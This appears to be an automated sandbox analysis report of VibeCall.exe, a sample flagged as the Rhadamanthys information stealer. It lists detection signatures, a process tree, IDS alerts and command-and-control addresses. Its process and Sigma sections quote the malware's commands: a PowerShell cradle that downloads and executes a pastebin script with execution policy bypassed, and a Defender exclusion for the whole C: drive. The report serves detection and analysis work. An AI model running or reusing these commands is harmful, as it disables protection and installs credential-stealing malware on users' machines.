Windows Analysis Report
VibeCall.exe

Overview

General Information

Sample name: VibeCall.exe
Analysis ID: 1627611
MD5: 946638e03405c5151c5b4a203fd0e251
SHA1: 24f5560acdbd32ea8e9fd3fcbc34f4c62c00d9a1
SHA256: 48a2c5750eb3d09f1c9b54becc1b261ce4bb659abecc38bd2bd56e5d20845c9d
Tags: CrazyEvilexeNoLogsMarchuser-g0njxa

Detection

RHADAMANTHYS
Score: 96
Range: 0 - 100
Confidence: 100%

Compliance

Score: 63
Range: 0 - 100

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Performs DNS queries to domains with low reputation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • VibeCall.exe (PID: 2300 cmdline: "C:\Users\user\Desktop\VibeCall.exe" MD5: 946638E03405C5151C5B4A203FD0E251)
    • powershell.exe (PID: 6840 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7280 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7724 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aisolution_vibecall_a.exe (PID: 8116 cmdline: "C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe" MD5: 55AAEC588AB6793DED2D2DFEC06DDD93)
      • fontdrvhost.exe (PID: 2044 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 7748 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
          • WerFault.exe (PID: 3900 cmdline: C:\Windows\system32\WerFault.exe -u -p 7748 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 8064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 660 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • contry_solution_vibecall_e.exe (PID: 8136 cmdline: "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe" MD5: E94DBC956D2AA25A91FA6D90FDF1AA85)
      • fontdrvhost.exe (PID: 1640 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
      • WerFault.exe (PID: 2176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8136 -s 664 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 2436 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8136 -s 684 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • soundsolution_vibecall_c.exe (PID: 2172 cmdline: "C:\Users\user\Downloads\soundsolution_vibecall_c.exe" MD5: CF3B58083031B698CD957B1116AAB575)
    • videosolution_vibecall_b.exe (PID: 5100 cmdline: "C:\Users\user\Downloads\videosolution_vibecall_b.exe" MD5: B9C44C022C8BE3B42AC71FA9DBFA67E1)
      • fontdrvhost.exe (PID: 4520 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
        • fontdrvhost.exe (PID: 8132 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
      • WerFault.exe (PID: 2164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 500 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 376 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": "https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc"}
Source | Rule | Description | Author
0000001F.00000003.2481606661.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
00000012.00000003.2593226340.0000000003E90000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000012.00000003.2589680228.00000000014B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
(20 further entries not shown)

Source | Rule | Description | Author
18.3.videosolution_vibecall_b.exe.3e90000.7.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
40.3.fontdrvhost.exe.5510000.7.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
14.3.aisolution_vibecall_a.exe.3ce0000.7.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
14.3.aisolution_vibecall_a.exe.3ac0000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
14.3.aisolution_vibecall_a.exe.3ce0000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
(15 further entries not shown)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7280, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 6840, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7280, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7280, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 6840, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content", ProcessId: 7280, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VibeCall.exe", ParentImage: C:\Users\user\Desktop\VibeCall.exe, ParentProcessId: 2300, ParentProcessName: VibeCall.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 6840, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-02T22:00:39.780475+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 188.114.97.3 | 80 | TCP
2025-03-02T22:00:44.884103+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 188.114.97.3 | 80 | TCP
2025-03-02T22:00:51.837526+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 188.114.97.3 | 80 | TCP
2025-03-02T22:00:54.779683+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 172.67.74.152 | 80 | TCP
2025-03-02T22:00:55.342317+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 208.95.112.1 | 80 | TCP
2025-03-02T22:00:58.036385+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 188.114.97.3 | 80 | TCP
2025-03-02T22:00:58.889075+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 172.67.74.152 | 80 | TCP
2025-03-02T22:00:58.998460+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 208.95.112.1 | 80 | TCP
2025-03-02T22:01:05.560959+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 172.67.74.152 | 80 | TCP
2025-03-02T22:01:05.655389+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 208.95.112.1 | 80 | TCP
2025-03-02T22:01:12.404733+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49779 | 172.67.74.152 | 80 | TCP
2025-03-02T22:01:12.514119+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 208.95.112.1 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-02T22:01:33.847363+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 171.22.120.233 | 4955 | 192.168.2.4 | 49940 | TCP
2025-03-02T22:01:37.305760+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 79.141.168.8 | 2113 | 192.168.2.4 | 49962 | TCP
2025-03-02T22:01:47.451664+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 45.129.185.24 | 1896 | 192.168.2.4 | 50026 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-02T22:00:21.667098+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49740 | 104.20.4.235 | 443 | TCP

AV Detection

Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe; Avira: detection malicious, Label: TR/Dropper.Gen
Source: 18.3.videosolution_vibecall_b.exe.1630000.8.unpack; Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc"}
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe; ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe; ReversingLabs: Detection: 45%
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe; ReversingLabs: Detection: 45%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.6% probability

Compliance

Source: VibeCall.exe; Static PE information: certificate valid
Source: unknown; HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: VibeCall.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wkernel32.pdb; source: aisolution_vibecall_a.exe, 0000000E.00000003.2441501280.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441359757.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb; source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441848134.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb; source: aisolution_vibecall_a.exe, 0000000E.00000003.2440187618.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2440417244.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP; source: aisolution_vibecall_a.exe, 0000000E.00000003.2440806354.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441027923.0000000003C60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP; source: aisolution_vibecall_a.exe, 0000000E.00000003.2440187618.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2440417244.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: aisolution_vibecall_a.exe, 0000000E.00000003.2440806354.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441027923.0000000003C60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb; source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: wkernelbase.pdbUGP; source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441848134.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP; source: aisolution_vibecall_a.exe, 0000000E.00000003.2441501280.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441359757.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb; source: VibeCall.exe, 00000000.00000000.1698594920.00007FF735F42000.00000002.00000001.01000000.00000003.sdmp
Source: C:\Windows\System32\fontdrvhost.exe; Code function: 4x nop then dec esp; 37_2_0000025F79D60511
Source: C:\Windows\System32\fontdrvhost.exe; Code function: 4x nop then dec esp; 45_2_0000026D37E90511

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 171.22.120.233:4955 -> 192.168.2.4:49940
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.129.185.24:1896 -> 192.168.2.4:50026
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 79.141.168.8:2113 -> 192.168.2.4:49962
                      Source: Malware configuration extractorURLs: https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc
                      Source: unknownDNS query: name: pastebin.com
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeDNS query: api.mirrow1-dell.xyz
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49751
                      Source: global trafficTCP traffic: 192.168.2.4:49747 -> 147.45.60.20:5000
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:00:39 GMTContent-Type: application/octet-streamContent-Length: 17363140Connection: keep-aliveLast-Modified: Thu, 27 Feb 2025 17:17:12 GMTETag: "67c09e18-108f0c4"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W0HMuwxEuOi3vwZW6qkqEGscC02vhZbqXecTRp7pMdcRegI3%2BscYHd7c92%2FsePQnZG4KsnQxIOJapnQ8Uf1OUCuR30DCV%2FEX1GD5RriLKjOmNa8C%2Bzh%2F86YFLKn9%2BdT%2BckvqCOruBwQp8pI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3d329bed442c6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1670&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=85&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 d8 Data Ascii: MZ@!L!This program cannot be run in DOS 
mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:00:44 GMTContent-Type: application/octet-streamContent-Length: 17235932Connection: keep-aliveLast-Modified: Thu, 27 Feb 2025 17:14:54 GMTETag: "67c09d8e-106ffdc"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xIImTFmc2qe8Px1FdlUE5rCHeV7M%2FrzPOwg6P9lA4%2FWAPcEE3ZR4oGwmb4yu0c2nMuydDouInpwhmqMt%2BN6j%2FmX59y59T4nBwiN%2FBT4%2BNfNFLDWQqyR9S26qYlH%2BXNrBKkIqzj313pCvRk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3d349bcd46a53-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1569&rtt_var=784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=90&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 ea Data Ascii: MZ@!L!This program cannot be run in DOS 
mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*
